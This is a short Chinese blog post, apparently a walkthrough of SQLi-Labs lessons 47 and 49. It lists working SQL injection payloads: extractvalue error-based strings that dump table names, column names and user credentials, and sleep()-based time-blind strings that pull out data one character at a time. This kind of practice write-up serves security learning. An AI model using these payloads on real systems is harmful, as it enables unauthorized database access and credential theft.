当前位置：网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)

SQL注入 Less47(报错注入) 和Less49(时间盲注)

2022-07-31 02:27:00 【开心星人】

Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合
order by 'rand()' 这条语句显然是执行不了的

Less47

?sort=1' and extractvalue(0,concat(0x7e,database()))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+

?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+

Less49

?sort=1' and sleep(5)--+

?sort=1' and if(1,sleep(5),0)--+

?sort=1' and if(length(database())=8,sleep(5),0)--+

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+

?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+

?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+

原网站

版权声明
本文为[开心星人]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_55675216/article/details/126076893